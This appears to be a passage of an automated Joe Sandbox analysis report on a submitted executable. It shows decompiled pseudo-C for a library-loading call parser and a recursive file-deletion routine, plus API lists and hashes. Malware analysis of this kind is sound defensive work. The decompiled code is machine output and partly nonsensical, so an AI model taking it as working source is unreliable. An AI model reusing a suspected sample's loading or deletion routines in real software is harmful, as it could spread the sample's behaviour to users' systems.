									switch( *((intOrPtr*)(( *(_t305 + 0x732d23e8) & 0x000000ff) * 4 +  &M732D235C))) {
										case 0:
											__ecx = _v24;
											__edi = _v12;
											while(1) {
												__edi = __edi + 1;
												__edi = __edi + 1;
												_v12 = __edi;
												__ax =  *__edi;
												__eflags = __ax - __dx;
												if(__ax != __dx) {
													goto L132;
												}
												L131:
												__eflags =  *((intOrPtr*)(__edi + 2)) - __dx;
												if( *((intOrPtr*)(__edi + 2)) != __dx) {
													L136:
													 *__ecx =  *__ecx & 0x00000000;
													__eax = E732D12CC(_v24);
													__ebx = __eax;
													goto L97;
												}
												L132:
												__eflags = __ax;
												if(__ax == 0) {
													goto L136;
												}
												__eflags = __ax - __dx;
												if(__ax == __dx) {
													__edi = __edi + 1;
													__edi = __edi + 1;
													__eflags = __edi;
												}
												__ax =  *__edi;
												 *__ecx =  *__edi;
												__ecx = __ecx + 1;
												__ecx = __ecx + 1;
												__edi = __edi + 1;
												__edi = __edi + 1;
												_v12 = __edi;
												__ax =  *__edi;
												__eflags = __ax - __dx;
												if(__ax != __dx) {
													goto L132;
												}
												goto L131;
											}
										case 1:
											_v8 = 1;
											goto L57;
										case 2:
											_v8 = _v8 | 0xffffffff;
											goto L57;
										case 3:
											_v8 = _v8 & 0x00000000;
											_v20 = _v20 & 0x00000000;
											_v16 = _v16 + 1;
											goto L85;
										case 4:
											__eflags = _v20;
											if(_v20 != 0) {
												goto L57;
											}
											_v12 = _v12 - 2;
											__ebx = E732D12BB();
											 &_v12 = E732D1B86( &_v12);
											__eax = E732D1510(__edx, __eax, __edx, __ebx);
											goto L97;
										case 5:
											L105:
											_v20 = _v20 + 1;
											goto L57;
										case 6:
											_push(7);
											goto L123;
										case 7:
											_push(0x19);
											goto L143;
										case 8:
											__eax = 0;
											__eax = 1;
											__eflags = 1;
											goto L107;
										case 9:
											_push(0x15);
											goto L143;
										case 0xa:
											_push(0x16);
											goto L143;
										case 0xb:
											_push(0x18);
											goto L143;
										case 0xc:
											__eax = 0;
											__eax = 1;
											__eflags = 1;
											goto L118;
										case 0xd:
											__eax = 0;
											__eax = 1;
											__eflags = 1;
											goto L109;
										case 0xe:
											__eax = 0;
											__eax = 1;
											__eflags = 1;
											goto L111;
										case 0xf:
											__eax = 0;
											__eax = 1;
											__eflags = 1;
											goto L122;
										case 0x10:
											__eax = 0;
											__eax = 1;
											__eflags = 1;
											goto L113;
										case 0x11:
											_push(3);
											goto L123;
										case 0x12:
											_push(0x17);
											L143:
											_pop(__ebx);
											goto L98;
										case 0x13:
											__eax =  &_v12;
											__eax = E732D1B86( &_v12);
											__ebx = __eax;
											__ebx = __eax + 1;
											__eflags = __ebx - 0xb;
											if(__ebx < 0xb) {
												__ebx = __ebx + 0xa;
											}
											goto L97;
										case 0x14:
											__ebx = 0xffffffff;
											goto L98;
										case 0x15:
											__eax = 0;
											__eax = 1;
											__eflags = 1;
											goto L116;
										case 0x16:
											__ecx = 0;
											__eflags = 0;
											goto L91;
										case 0x17:
											__eax = 0;
											__eax = 1;
											__eflags = 1;
											goto L120;
										case 0x18:
											_t271 =  *(_t332 + 0x1014);
											__eflags = _t271 - _v16;
											if(_t271 > _v16) {
												_v16 = _t271;
											}
											_v8 = _v8 & 0x00000000;
											_v20 = _v20 & 0x00000000;
											_v36 - 3 = _t271 - (_v36 == 3);
											if(_t271 != _v36 == 3) {
												L85:
												_v40 = 1;
											}
											goto L57;
										case 0x19:
											L107:
											__ecx = 0;
											_v8 = 2;
											__ecx = 1;
											goto L91;
										case 0x1a:
											L118:
											_push(5);
											goto L123;
										case 0x1b:
											L109:
											__ecx = 0;
											_v8 = 3;
											__ecx = 1;
											goto L91;
										case 0x1c:
											L111:
											__ecx = 0;
											__ecx = 1;
											goto L91;
										case 0x1d:
											L122:
											_push(6);
											goto L123;
										case 0x1e:
											L113:
											_push(2);
											goto L123;
										case 0x1f:
											__eax =  &_v12;
											__eax = E732D1B86( &_v12);
											__ebx = __eax;
											__ebx = __eax + 1;
											goto L97;
										case 0x20:
											L116:
											_v52 = _v52 + 1;
											_push(4);
											_pop(__ecx);
											goto L91;
										case 0x21:
											L120:
											_push(4);
											L123:
											_pop(__ecx);
											L91:
											__edi = _v16;
											__edx =  *(0x732d405c + __ecx * 4);
											__eax =  ~__eax;
											asm("sbb eax, eax");
											_v40 = 1;
											__edi = _v16 << 5;
											__eax = __eax & 0x00008000;
											__edi = (_v16 << 5) + __esi;
											__eax = __eax | __ecx;
											__eflags = _v8;
											 *(__edi + 0x1018) = __eax;
											if(_v8 < 0) {
												L93:
												__edx = 0;
												__edx = 1;
												__eflags = 1;
												L94:
												__eflags = _v8 - 1;
												 *(__edi + 0x1028) = __edx;
												if(_v8 == 1) {
													__eax =  &_v12;
													__eax = E732D1B86( &_v12);
													__eax = __eax + 1;
													__eflags = __eax;
													_v8 = __eax;
												}
												__eax = _v8;
												 *((intOrPtr*)(__edi + 0x101c)) = _v8;
												_t136 = _v16 + 0x81; // 0x81
												_t136 = _t136 << 5;
												__eax = 0;
												__eflags = 0;
												 *((intOrPtr*)((_t136 << 5) + __esi)) = 0;
												 *((intOrPtr*)(__edi + 0x1030)) = 0;
												 *((intOrPtr*)(__edi + 0x102c)) = 0;
												L97:
												__eflags = __ebx;
												if(__ebx == 0) {
													goto L57;
												}
												L98:
												__eflags = _v20;
												_v40 = 1;
												if(_v20 != 0) {
													L103:
													__eflags = _v20 - 1;
													if(_v20 == 1) {
														__eax = _v16;
														__eax = _v16 << 5;
														__eflags = __eax;
														 *(__eax + __esi + 0x102c) = __ebx;
													}
													goto L105;
												}
												_v16 = _v16 << 5;
												_t144 = __esi + 0x1030; // 0x1030
												__edi = (_v16 << 5) + _t144;
												__eax =  *__edi;
												__eflags = __eax - 0xffffffff;
												if(__eax <= 0xffffffff) {
													L101:
													__eax = GlobalFree(__eax);
													L102:
													 *__edi = __ebx;
													goto L103;
												}
												__eflags = __eax - 0x19;
												if(__eax <= 0x19) {
													goto L102;
												}
												goto L101;
											}
											__eflags = __edx;
											if(__edx > 0) {
												goto L94;
											}
											goto L93;
										case 0x22:
											goto L57;
									}
								}
								_t272 = _t269 - 1;
								__eflags = _t272;
								if(_t272 == 0) {
									_v16 = _t283;
									goto L80;
								}
								__eflags = _t272 != 1;
								if(_t272 != 1) {
									goto L162;
								}
								__eflags = _t286 - 0x6e;
								if(__eflags > 0) {
									_t309 = _t286 - 0x72;
									__eflags = _t309;
									if(_t309 == 0) {
										_push(4);
										L74:
										_pop(_t274);
										L75:
										__eflags = _v8 - 1;
										if(_v8 != 1) {
											_t96 = _t332 + 0x1010;
											 *_t96 =  *(_t332 + 0x1010) &  !_t274;
											__eflags =  *_t96;
										} else {
											 *(_t332 + 0x1010) =  *(_t332 + 0x1010) | _t274;
										}
										_v8 = 1;
										goto L57;
									}
									_t312 = _t309 - 1;
									__eflags = _t312;
									if(_t312 == 0) {
										_push(0x10);
										goto L74;
									}
									__eflags = _t312 != 0;
									if(_t312 != 0) {
										goto L57;
									}
									_push(0x40);
									goto L74;
								}
								if(__eflags == 0) {
									_push(8);
									goto L74;
								}
								_t315 = _t286 - 0x21;
								__eflags = _t315;
								if(_t315 == 0) {
									_v8 =  ~_v8;
									goto L57;
								}
								_t316 = _t315 - 0x11;
								__eflags = _t316;
								if(_t316 == 0) {
									_t274 = 0x100;
									goto L75;
								}
								_t317 = _t316 - 0x31;
								__eflags = _t317;
								if(_t317 == 0) {
									_t274 = 1;
									goto L75;
								}
								__eflags = _t317 != 0;
								if(_t317 != 0) {
									goto L57;
								}
								_push(0x20);
								goto L74;
							} else {
								_v32 = _t283;
								_v36 = _t283;
								goto L20;
							}
						}
						__eflags =  *((short*)(_t321 - 2)) - 0x3a;
						if( *((short*)(_t321 - 2)) != 0x3a) {
							goto L17;
						}
						__eflags = _v32 - _t283;
						if(_v32 == _t283) {
							goto L43;
						}
						goto L17;
					}
					_t277 = _t258 - 5;
					if(_t277 == 0) {
						__eflags = _v44 - _t283;
						if(_v44 != _t283) {
							goto L43;
						} else {
							__eflags = _v36 - 3;
							_v32 = 1;
							_v8 = _t283;
							_v20 = _t283;
							_v16 = (0 | _v36 == 0x00000003) + 1;
							_v40 = _t283;
							goto L20;
						}
					}
					_t281 = _t277 - 1;
					if(_t281 == 0) {
						__eflags = _v44 - _t283;
						if(_v44 != _t283) {
							goto L43;
						} else {
							_v32 = 2;
							_v8 = _t283;
							_v20 = _t283;
							goto L20;
						}
					}
					if(_t281 != 0x16) {
						goto L43;
					} else {
						_v32 = 3;
						_v8 = 1;
						goto L20;
					}
				}
				GlobalFree(_v56);
				GlobalFree(_v24);
				GlobalFree(_v48);
				if(_t332 == _t283 ||  *(_t332 + 0x100c) != _t283) {
					L182:
					return _t332;
				} else {
					_t225 =  *_t332 - 1;
					if(_t225 == 0) {
						_t187 = _t332 + 8; // 0x8
						_t324 = _t187;
						__eflags =  *_t324 - _t283;
						if( *_t324 != _t283) {
							_t226 = GetModuleHandleW(_t324); // executed
							__eflags = _t226 - _t283;
							 *(_t332 + 0x1008) = _t226;
							if(_t226 != _t283) {
								L171:
								_t192 = _t332 + 0x808; // 0x808
								_t325 = _t192;
								_t227 = E732D16BD( *(_t332 + 0x1008), _t325);
								__eflags = _t227 - _t283;
								 *(_t332 + 0x100c) = _t227;
								if(_t227 == _t283) {
									__eflags =  *_t325 - 0x23;
									if( *_t325 == 0x23) {
										_t195 = _t332 + 0x80a; // 0x80a
										_t231 = E732D13B1(_t195);
										__eflags = _t231 - _t283;
										if(_t231 != _t283) {
											__eflags = _t231 & 0xffff0000;
											if((_t231 & 0xffff0000) == 0) {
												 *(_t332 + 0x100c) = GetProcAddress( *(_t332 + 0x1008), _t231 & 0x0000ffff);
											}
										}
									}
								}
								__eflags = _v52 - _t283;
								if(_v52 != _t283) {
									L178:
									_t325[lstrlenW(_t325)] = 0x57;
									_t229 = E732D16BD( *(_t332 + 0x1008), _t325);
									__eflags = _t229 - _t283;
									if(_t229 != _t283) {
										L166:
										 *(_t332 + 0x100c) = _t229;
										goto L182;
									}
									__eflags =  *(_t332 + 0x100c) - _t283;
									L180:
									if(__eflags != 0) {
										goto L182;
									}
									L181:
									_t206 = _t332 + 4;
									 *_t206 =  *(_t332 + 4) | 0xffffffff;
									__eflags =  *_t206;
									goto L182;
								} else {
									__eflags =  *(_t332 + 0x100c) - _t283;
									if( *(_t332 + 0x100c) != _t283) {
										goto L182;
									}
									goto L178;
								}
							}
							_t234 = LoadLibraryW(_t324); // executed
							__eflags = _t234 - _t283;
							 *(_t332 + 0x1008) = _t234;
							if(_t234 == _t283) {
								goto L181;
							}
							goto L171;
						}
						_t188 = _t332 + 0x808; // 0x808
						_t236 = E732D13B1(_t188);
						 *(_t332 + 0x100c) = _t236;
						__eflags = _t236 - _t283;
						goto L180;
					}
					_t237 = _t225 - 1;
					if(_t237 == 0) {
						_t185 = _t332 + 0x808; // 0x808
						_t238 = _t185;
						__eflags =  *_t238 - _t283;
						if( *_t238 == _t283) {
							goto L182;
						}
						_t229 = E732D13B1(_t238);
						L165:
						goto L166;
					}
					if(_t237 != 1) {
						goto L182;
					}
					_t81 = _t332 + 8; // 0x8
					_t284 = _t81;
					_t326 = E732D13B1(_t81);
					 *(_t332 + 0x1008) = _t326;
					if(_t326 == 0) {
						goto L181;
					}
					 *(_t332 + 0x104c) =  *(_t332 + 0x104c) & 0x00000000;
					 *((intOrPtr*)(_t332 + 0x1050)) = E732D12CC(_t284);
					 *(_t332 + 0x103c) =  *(_t332 + 0x103c) & 0x00000000;
					 *((intOrPtr*)(_t332 + 0x1048)) = 1;
					 *((intOrPtr*)(_t332 + 0x1038)) = 1;
					_t90 = _t332 + 0x808; // 0x808
					_t229 =  *(_t326->i + E732D13B1(_t90) * 4);
					goto L165;
				}
			}

0x732d1c07
0x732d1c0a
0x732d1c0d
0x732d1c10
0x732d1c13
0x732d1c16
0x732d1c19
0x732d1c1b
0x732d1c1e
0x732d1c21
0x732d1c26
0x732d1c29
0x732d1c31
0x732d1c39
0x732d1c3b
0x732d1c3e
0x732d1c46
0x732d1c46
0x732d1c4b
0x732d1c4e
0x00000000
0x00000000
0x732d1c5b
0x732d1c60
0x732d1c62
0x732d1cf4
0x732d1cf4
0x732d1cf4
0x732d1cf8
0x732d1cfb
0x732d1cfd
0x732d1d1f
0x732d1d21
0x732d1d24
0x732d1d33
0x732d1d35
0x732d1d3b
0x732d1d3b
0x732d1d41
0x732d1d44
0x732d1d44
0x732d1d47
0x732d1d47
0x732d1d4d
0x732d1d4f
0x732d1d4f
0x732d1d51
0x732d1d54
0x732d1d57
0x732d1d5d
0x732d1d63
0x732d1d66
0x732d1d8a
0x732d1d8d
0x00000000
0x00000000
0x732d1d90
0x732d1d92
0x732d1da0
0x732d1da3
0x732d1da5
0x00000000
0x00000000
0x00000000
0x00000000
0x732d1da7
0x732d1da7
0x732d1da7
0x732d1dad
0x732d1daf
0x00000000
0x00000000
0x732d1db1
0x732d1db3
0x732d1db5
0x732d1db7
0x00000000
0x00000000
0x00000000
0x732d1db7
0x732d1db9
0x732d1dbb
0x732d1dbd
0x732d1dbd
0x732d1dc3
0x732d1dc9
0x732d1dcb
0x732d1ddf
0x732d1ddf
0x732d1de1
0x732d1dcd
0x732d1dd3
0x732d1dd6
0x732d1dd6
0x00000000
0x732d1d68
0x732d1d68
0x732d1d68
0x732d1d69
0x732d1d71
0x732d1d75
0x732d1d7b
0x732d1d7f
0x00000000
0x732d1d7f
0x732d1d6b
0x732d1d6b
0x732d1d6c
0x00000000
0x00000000
0x732d1d6e
0x732d1d6f
0x00000000
0x00000000
0x00000000
0x732d1d6f
0x732d1cff
0x732d1d00
0x732d1d09
0x732d1d0c
0x732d1d19
0x732d1d19
0x732d1d0e
0x732d1d0e
0x732d1de7
0x732d1dea
0x732d1dee
0x732d1e61
0x732d1e65
0x732d1c43
0x00000000
0x732d1c43
0x00000000
0x732d1e65
0x732d1cfd
0x732d1c68
0x732d1c6b
0x732d1cce
0x732d1cd1
0x732d1ce3
0x732d1ce3
0x732d1ce6
0x732d1df3
0x732d1df6
0x732d1df6
0x732d1df8
0x732d21ae
0x732d21c6
0x732d21c6
0x732d21c9
0x00000000
0x00000000
0x732d21b3
0x732d21b4
0x732d21b7
0x732d21ba
0x732d2244
0x732d224b
0x732d2251
0x732d2255
0x732d1e5c
0x732d1e5d
0x732d1e5d
0x732d1e5e
0x00000000
0x732d1e5e
0x732d21c0
0x732d21c3
0x732d21c3
0x732d21cb
0x732d21ce
0x732d2238
0x732d1e51
0x732d1e54
0x732d1e57
0x732d1e5a
0x732d1e5a
0x00000000
0x732d1e5a
0x732d21d0
0x732d21d3
0x732d21da
0x732d21da
0x732d21dd
0x732d21e1
0x732d21f5
0x732d21f5
0x732d21f8
0x732d21fc
0x00000000
0x00000000
0x732d21fe
0x732d2202
0x00000000
0x00000000
0x732d2204
0x732d220b
0x732d220b
0x732d2211
0x732d2214
0x732d2230
0x732d2216
0x732d221f
0x732d2222
0x732d2222
0x00000000
0x732d2214
0x732d21e3
0x732d21e6
0x732d21ea
0x00000000
0x00000000
0x732d21ec
0x00000000
0x732d21ec
0x732d21d5
0x732d21d8
0x00000000
0x00000000
0x00000000
0x732d21d8
0x732d1dfe
0x732d1dfe
0x732d1dff
0x732d1f49
0x732d1f49
0x732d1f50
0x732d1f53
0x00000000
0x00000000
0x732d1f60
0x00000000
0x732d214b
0x732d214e
0x732d2151
0x732d2151
0x732d2152
0x732d2153
0x732d2156
0x732d2159
0x732d215c
0x00000000
0x00000000
0x732d215e
0x732d215e
0x732d2162
0x732d217a
0x732d217d
0x732d2181
0x732d2187
0x00000000
0x732d2187
0x732d2164
0x732d2164
0x732d2167
0x00000000
0x00000000
0x732d2169
0x732d216c
0x732d216e
0x732d216f
0x732d216f
0x732d216f
0x732d2170
0x732d2173
0x732d2176
0x732d2177
0x732d2151
0x732d2152
0x732d2153
0x732d2156
0x732d2159
0x732d215c
0x00000000
0x00000000
0x00000000
0x732d215c
0x00000000
0x732d1fa7
0x00000000
0x00000000
0x732d1fb3
0x00000000
0x00000000
0x732d1f9a
0x732d1f9e
0x732d1fa2
0x00000000
0x00000000
0x732d211c
0x732d2120
0x00000000
0x00000000
0x732d2126
0x732d212f
0x732d2136
0x732d213e
0x00000000
0x00000000
0x732d2083
0x732d2083
0x00000000
0x00000000
0x732d1fbc
0x00000000
0x00000000
0x732d21a6
0x00000000
0x00000000
0x732d208b
0x732d208d
0x732d208d
0x00000000
0x00000000
0x732d2196
0x00000000
0x00000000
0x732d219a
0x00000000
0x00000000
0x732d21a2
0x00000000
0x00000000
0x732d20d3
0x732d20d5
0x732d20d5
0x00000000
0x00000000
0x732d209d
0x732d209f
0x732d209f
0x00000000
0x00000000
0x732d20af
0x732d20b1
0x732d20b1
0x00000000
0x00000000
0x732d20e1
0x732d20e3
0x732d20e3
0x00000000
0x00000000
0x732d20ba
0x732d20bc
0x732d20bc
0x00000000
0x00000000
0x732d20c1
0x00000000
0x00000000
0x732d219e
0x732d21a8
0x732d21a8
0x00000000
0x00000000
0x732d20ec
0x732d20f0
0x732d20f5
0x732d20f8
0x732d20f9
0x732d20fc
0x732d2102
0x732d2102
0x00000000
0x00000000
0x732d218e
0x00000000
0x00000000
0x732d20c5
0x732d20c7
0x732d20c7
0x00000000
0x00000000
0x732d1fc3
0x732d1fc3
0x00000000
0x00000000
0x732d20da
0x732d20dc
0x732d20dc
0x00000000
0x00000000
0x732d1f67
0x732d1f6d
0x732d1f70
0x732d1f72
0x732d1f72
0x732d1f75
0x732d1f79
0x732d1f86
0x732d1f88
0x732d1f8e
0x732d1f8e
0x732d1f8e
0x00000000
0x00000000
0x732d208e
0x732d208e
0x732d2090
0x732d2097
0x00000000
0x00000000
0x732d20d6
0x732d20d6
0x00000000
0x00000000
0x732d20a0
0x732d20a0
0x732d20a2
0x732d20a9
0x00000000
0x00000000
0x732d20b2
0x732d20b2
0x732d20b4
0x00000000
0x00000000
0x732d20e4
0x732d20e4
0x00000000
0x00000000
0x732d20bd
0x732d20bd
0x00000000
0x00000000
0x732d210a
0x732d210e
0x732d2113
0x732d2116
0x00000000
0x00000000
0x732d20c8
0x732d20c8
0x732d20cb
0x732d20cd
0x00000000
0x00000000
0x732d20dd
0x732d20dd
0x732d20e6
0x732d20e6
0x732d1fc5
0x732d1fc5
0x732d1fc8
0x732d1fcf
0x732d1fd1
0x732d1fd3
0x732d1fda
0x732d1fdd
0x732d1fe2
0x732d1fe4
0x732d1fe6
0x732d1fea
0x732d1ff0
0x732d1ff6
0x732d1ff6
0x732d1ff8
0x732d1ff8
0x732d1ff9
0x732d1ff9
0x732d1ffd
0x732d2003
0x732d2005
0x732d2009
0x732d200e
0x732d200e
0x732d2010
0x732d2010
0x732d2013
0x732d2016
0x732d201f
0x732d2025
0x732d2028
0x732d2028
0x732d202a
0x732d202d
0x732d2033
0x732d2039
0x732d2039
0x732d203b
0x00000000
0x00000000
0x732d2041
0x732d2041
0x732d2045
0x732d204c
0x732d2070
0x732d2070
0x732d2074
0x732d2076
0x732d2079
0x732d2079
0x732d207c
0x732d207c
0x00000000
0x732d2074
0x732d2051
0x732d2054
0x732d2054
0x732d205b
0x732d205d
0x732d2060
0x732d2067
0x732d2068
0x732d206e
0x732d206e
0x00000000
0x732d206e
0x732d2062
0x732d2065
0x00000000
0x00000000
0x00000000
0x732d2065
0x732d1ff2
0x732d1ff4
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x732d1f60
0x732d1e05
0x732d1e05
0x732d1e06
0x732d1f46
0x00000000
0x732d1f46
0x732d1e0c
0x732d1e0d
0x00000000
0x00000000
0x732d1e13
0x732d1e16
0x732d1f0b
0x732d1f0b
0x732d1f0e
0x732d1f23
0x732d1f25
0x732d1f25
0x732d1f26
0x732d1f29
0x732d1f2c
0x732d1f38
0x732d1f38
0x732d1f38
0x732d1f2e
0x732d1f2e
0x732d1f2e
0x732d1f3e
0x00000000
0x732d1f3e
0x732d1f10
0x732d1f10
0x732d1f11
0x732d1f1f
0x00000000
0x732d1f1f
0x732d1f14
0x732d1f15
0x00000000
0x00000000
0x732d1f1b
0x00000000
0x732d1f1b
0x732d1e1c
0x732d1f07
0x00000000
0x732d1f07
0x732d1e22
0x732d1e22
0x732d1e25
0x732d1e4e
0x00000000
0x732d1e4e
0x732d1e27
0x732d1e27
0x732d1e2a
0x732d1e44
0x00000000
0x732d1e44
0x732d1e2c
0x732d1e2c
0x732d1e2f
0x732d1e3e
0x00000000
0x732d1e3e
0x732d1e32
0x732d1e33
0x00000000
0x00000000
0x732d1e35
0x00000000
0x732d1cec
0x732d1cec
0x732d1cef
0x00000000
0x732d1cef
0x732d1ce6
0x732d1cd3
0x732d1cd8
0x00000000
0x00000000
0x732d1cda
0x732d1cdd
0x00000000
0x00000000
0x00000000
0x732d1cdd
0x732d1c6d
0x732d1c70
0x732d1ca6
0x732d1ca9
0x00000000
0x732d1caf
0x732d1cb1
0x732d1cb5
0x732d1cbc
0x732d1cc3
0x732d1cc6
0x732d1cc9
0x00000000
0x732d1cc9
0x732d1ca9
0x732d1c72
0x732d1c73
0x732d1c8e
0x732d1c91
0x00000000
0x732d1c97
0x732d1c97
0x732d1c9e
0x732d1ca1
0x00000000
0x732d1ca1
0x732d1c91
0x732d1c78
0x00000000
0x732d1c7e
0x732d1c7e
0x732d1c85
0x00000000
0x732d1c85
0x732d1c78
0x732d1e74
0x732d1e79
0x732d1e7e
0x732d1e82
0x732d2355
0x732d235b
0x732d1e94
0x732d1e96
0x732d1e97
0x732d227e
0x732d227e
0x732d2281
0x732d2284
0x732d22a1
0x732d22a7
0x732d22a9
0x732d22af
0x732d22c6
0x732d22c6
0x732d22c6
0x732d22d3
0x732d22d9
0x732d22dc
0x732d22e2
0x732d22e4
0x732d22e8
0x732d22ea
0x732d22f1
0x732d22f6
0x732d22f9
0x732d22fb
0x732d2300
0x732d2312
0x732d2312
0x732d2300
0x732d22f9
0x732d22e8
0x732d2318
0x732d231b
0x732d2325
0x732d232d
0x732d233a
0x732d2340
0x732d2343
0x732d2273
0x732d2273
0x00000000
0x732d2273
0x732d2349
0x732d234f
0x732d234f
0x00000000
0x00000000
0x732d2351
0x732d2351
0x732d2351
0x732d2351
0x00000000
0x732d231d
0x732d231d
0x732d2323
0x00000000
0x00000000
0x00000000
0x732d2323
0x732d231b
0x732d22b2
0x732d22b8
0x732d22ba
0x732d22c0
0x00000000
0x00000000
0x00000000
0x732d22c0
0x732d2286
0x732d228d
0x732d2293
0x732d2299
0x00000000
0x732d2299
0x732d1e9d
0x732d1e9e
0x732d225d
0x732d225d
0x732d2263
0x732d2266
0x00000000
0x00000000
0x732d226d
0x732d2272
0x00000000
0x732d2272
0x732d1ea5
0x00000000
0x00000000
0x732d1eab
0x732d1eab
0x732d1eb4
0x732d1eb9
0x732d1ebf
0x00000000
0x00000000
0x732d1ec5
0x732d1ed2
0x732d1ed8
0x732d1ee2
0x732d1ee8
0x732d1ef0
0x732d1f00
0x00000000
0x732d1f00

APIs

Part of subcall function 732D12BB: GlobalAlloc.KERNELBASE(00000040,?,732D12DB,?,732D137F,00000019,732D11CA,-000000A0), ref: 732D12C5

GlobalAlloc.KERNEL32(00000040,00001CA4), ref: 732D1D2D
lstrcpyW.KERNEL32 ref: 732D1D75
lstrcpyW.KERNEL32 ref: 732D1D7F
GlobalFree.KERNEL32 ref: 732D1D92
GlobalFree.KERNEL32 ref: 732D1E74
GlobalFree.KERNEL32 ref: 732D1E79
GlobalFree.KERNEL32 ref: 732D1E7E
GlobalFree.KERNEL32 ref: 732D2068
lstrcpyW.KERNEL32 ref: 732D2222
GetModuleHandleW.KERNELBASE(00000008), ref: 732D22A1
LoadLibraryW.KERNELBASE(00000008), ref: 732D22B2
GetProcAddress.KERNEL32(?,?), ref: 732D230C
lstrlenW.KERNEL32(00000808), ref: 732D2326

Strings

Nv@hv, xrefs: 732D230C

Memory Dump Source

Source File: 00000001.00000002.886480223.00000000732D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 732D0000, based on PE: true

Associated: 00000001.00000002.886476119.00000000732D0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.886488080.00000000732D4000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.886506522.00000000732D6000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_732d0000_aSsc9zh1ex.jbxd

Similarity

API ID: Global$Free$lstrcpy$Alloc$AddressHandleLibraryLoadModuleProclstrlen
String ID: Nv@hv
API String ID: 245916457-4226514844
Opcode ID: 97d5ff7e89a1258bb193f54907edecb86093f97fd8bd074944686c3e049b375d
Instruction ID: cfbcbac67c27dcd424be88eae603c4aeb2669b57b14cef492626d91ac3ae3b5e
Opcode Fuzzy Hash: 97d5ff7e89a1258bb193f54907edecb86093f97fd8bd074944686c3e049b375d
Instruction Fuzzy Hash: 5F22AB71E3430ADFDB918FB4C9843AEB7B5FB04305F14852AD1A6E6684D7B4A6C1CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00405C26 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 148
filestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 98%

			E00405C26(void* __eflags, signed int _a4, signed int _a8) {
				signed int _v8;
				signed int _v12;
				short _v556;
				short _v558;
				struct _WIN32_FIND_DATAW _v604;
				signed int _t38;
				signed int _t52;
				signed int _t55;
				signed int _t62;
				void* _t64;
				signed char _t65;
				WCHAR* _t66;
				void* _t67;
				WCHAR* _t68;
				void* _t70;

				_t65 = _a8;
				_t68 = _a4;
				_v8 = _t65 & 0x00000004;
				_t38 = E00405EF1(__eflags, _t68);
				_v12 = _t38;
				if((_t65 & 0x00000008) != 0) {
					_t62 = DeleteFileW(_t68); // executed
					asm("sbb eax, eax");
					_t64 =  ~_t62 + 1;
					 *0x7a8ae8 =  *0x7a8ae8 + _t64;
					return _t64;
				}
				_a4 = _t65;
				_t8 =  &_a4;
				 *_t8 = _a4 & 0x00000001;
				__eflags =  *_t8;
				if( *_t8 == 0) {
					L5:
					E0040651A(0x7a3f50, _t68);
					__eflags = _a4;
					if(_a4 == 0) {
						E00405E35(_t68);
					} else {
						lstrcatW(0x7a3f50, L"\\*.*");
					}
					__eflags =  *_t68;
					if( *_t68 != 0) {
						L10:
						lstrcatW(_t68, 0x40a014);
						L11:
						_t66 =  &(_t68[lstrlenW(_t68)]);
						_t38 = FindFirstFileW(0x7a3f50,  &_v604);
						_t70 = _t38;
						__eflags = _t70 - 0xffffffff;
						if(_t70 == 0xffffffff) {
							L26:
							__eflags = _a4;
							if(_a4 != 0) {
								_t30 = _t66 - 2;
								 *_t30 =  *(_t66 - 2) & 0x00000000;
								__eflags =  *_t30;
							}
							goto L28;
						} else {
							goto L12;
						}
						do {
							L12:
							__eflags = _v604.cFileName - 0x2e;
							if(_v604.cFileName != 0x2e) {
								L16:
								E0040651A(_t66,  &(_v604.cFileName));
								__eflags = _v604.dwFileAttributes & 0x00000010;
								if(__eflags == 0) {
									_t52 = E00405BDE(__eflags, _t68, _v8);
									__eflags = _t52;
									if(_t52 != 0) {
										E0040557C(0xfffffff2, _t68);
									} else {
										__eflags = _v8 - _t52;
										if(_v8 == _t52) {
											 *0x7a8ae8 =  *0x7a8ae8 + 1;
										} else {
											E0040557C(0xfffffff1, _t68);
											E004062DA(_t67, _t68, 0);
										}
									}
								} else {
									__eflags = (_a8 & 0x00000003) - 3;
									if(__eflags == 0) {
										E00405C26(__eflags, _t68, _a8);
									}
								}
								goto L24;
							}
							__eflags = _v558;
							if(_v558 == 0) {
								goto L24;
							}
							__eflags = _v558 - 0x2e;
							if(_v558 != 0x2e) {
								goto L16;
							}
							__eflags = _v556;
							if(_v556 == 0) {
								goto L24;
							}
							goto L16;
							L24:
							_t55 = FindNextFileW(_t70,  &_v604);
							__eflags = _t55;
						} while (_t55 != 0);
						_t38 = FindClose(_t70);
						goto L26;
					}
					__eflags =  *0x7a3f50 - 0x5c;
					if( *0x7a3f50 != 0x5c) {
						goto L11;
					}
					goto L10;
				} else {
					__eflags = _t38;
					if(_t38 == 0) {
						L28:
						__eflags = _a4;
						if(_a4 == 0) {
							L36:
							return _t38;
						}
						__eflags = _v12;
						if(_v12 != 0) {
							_t38 = E00406850(_t68);
							__eflags = _t38;
							if(_t38 == 0) {
								goto L36;
							}
							E00405DE9(_t68);
							_t38 = E00405BDE(__eflags, _t68, _v8 | 0x00000001);
							__eflags = _t38;
							if(_t38 != 0) {
								return E0040557C(0xffffffe5, _t68);
							}
							__eflags = _v8;
							if(_v8 == 0) {
								goto L30;
							}
							E0040557C(0xfffffff1, _t68);
							return E004062DA(_t67, _t68, 0);
						}
						L30:
						 *0x7a8ae8 =  *0x7a8ae8 + 1;
						return _t38;
					}
					__eflags = _t65 & 0x00000002;
					if((_t65 & 0x00000002) == 0) {
						goto L28;
					}
					goto L5;
				}
			}

0x00405c30
0x00405c35
0x00405c3e
0x00405c41
0x00405c49
0x00405c4c
0x00405c4f
0x00405c57
0x00405c59
0x00405c5a
0x00000000
0x00405c5a
0x00405c65
0x00405c68
0x00405c68
0x00405c68
0x00405c6c
0x00405c7f
0x00405c86
0x00405c8b
0x00405c8f
0x00405c9f
0x00405c91
0x00405c97
0x00405c97
0x00405ca4
0x00405ca8
0x00405cb4
0x00405cba
0x00405cbf
0x00405cc5
0x00405cd0
0x00405cd6
0x00405cd8
0x00405cdb
0x00405d85
0x00405d85
0x00405d89
0x00405d8b
0x00405d8b
0x00405d8b
0x00405d8b
0x00000000
0x00000000
0x00000000
